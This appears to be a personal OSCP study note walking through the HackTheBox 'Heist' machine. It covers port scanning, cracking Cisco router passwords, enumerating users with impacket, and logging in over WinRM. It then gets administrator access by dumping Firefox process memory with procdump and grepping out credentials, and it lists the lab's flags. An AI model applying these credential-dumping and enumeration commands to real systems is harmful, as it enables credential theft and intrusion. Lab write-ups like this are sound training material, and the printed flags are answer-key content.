htb-windows-1-heist - My-oscp-all-things

10.10.10.149 ### information gathering ``` Open 10.10.10.149:80 Open 10.10.10.149:135 Open 10.10.10.149:445 Open 10.10.10.149:5985 Open 10.10.10.149:49669 ``` http://10.10.10.149/attachments/config.txt ![[Pasted image 20220115165636.png]] password ``` rout3r : 0242114B0E143F015F5D1E161713 admin : 02375012182C1A1D751618034F36415408 secret : $1$pdQG$o8nrSzsGXeaduXrjlvKc91 ``` ![[Pasted image 20220115163102.png]] ![[Pasted image 20220115163052.png]] ### foothold ![[Pasted image 20220115163442.png]] ``` stealth1agent ``` https://packetlife.net/toolbox/type7/ ![[Pasted image 20220115163843.png]] ![[Pasted image 20220115163912.png]] ``` rout3r : $uperP@ssword admin : Q4)sJu\Y8qz*A3?d ``` ![[Pasted image 20220115164723.png]] ``` Hazard : stealth1agent Domain : SupportDesk ``` ``` impacket-lookupsid [email protected] to get all users ``` user-list ``` Hazard support Chase Jason ``` ![[Pasted image 20220115170338.png]] ``` Chase : Q4)sJu\Y8qz*A3?d ->can login winrm ``` ![[Pasted image 20220115170716.png]] todo : ``` cmd.exe /c "SharpHound.exe -c all --domain htb" cmd.exe /c "SharpHound.exe -c all --domain SupportDesk" ``` AbuseFunction : Write-HijackDll -OutputFile 'C:\Users\Chase\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll' -Command '...' ``` AppCmd.exe was found in C:\Windows\system32\inetsrv\appcmd.exe Firefox credentials file exists at C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles\77nc64t5.default\key4.db # dump the db to crack Run SharpWeb (https://github.com/djhohnstein/SharpWeb) C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml C:\Windows\Panther\Unattend.xm ``` ### privilege to administrator -> procdump64.exe strings64.exe ![[Pasted image 20220115181119.png]] ``` ps or get-process firefox procdump64.exe -ma 5008 -accepteula strings64.exe -accepteula firefox.exe_220115_155522.dmp > firefox.txt ``` ![[Pasted image 20220115181525.png]] ``` admin : 4dD!5}x/re8]FBuZ ``` ![[Pasted image 20220115181619.png]] beyond root [Mimikittenz](https://github.com/putterpanda/mimikittenz) https://0xdf.gitlab.io/2019/11/30/htb-heist.html ``` grep -aoE 'login_username=.{1,20}@.{1,20}&login_password=.{1,50}&login=' firefox.exe_190823_025430.dmp ``` ### flags ``` user.txt : 46c7bb70691b10bc06c79c00a8ab579b root.txt : 529c2e94d9646627d0080e4a696eb88e ```